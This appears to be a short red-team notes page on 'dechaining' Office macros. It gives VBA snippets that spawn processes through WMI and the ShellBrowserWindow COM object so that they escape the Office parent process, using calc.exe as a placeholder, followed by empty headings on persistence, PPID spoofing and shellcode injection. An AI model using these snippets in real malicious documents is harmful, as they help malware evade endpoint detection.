Dechaining Macros
WMI
Sub MyMacro()
Arg = "cmd /k calc.exe"
GetObject("winmgmts:").Get("Win32_Process").Create Arg, Null, Null, pid
End SubSet objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set objStartup = objWMIService.Get("Win32_ProcessStartup")
Set objConfig = objStartup.SpawnInstance_
Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")
errReturn = objProcess.Create("cmd.exe /k calc.exe", Null, objConfig, intProcessID)ShellBrowserWindow
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "calc",Null,"C:\\Windows\\System32",Null,0XMLDOM
Scheduled Tasks
Registry Keys
PPID Spoofing and Command Line Spoofing
Injecting Shellcode
Template persistence
Outlook
Last updated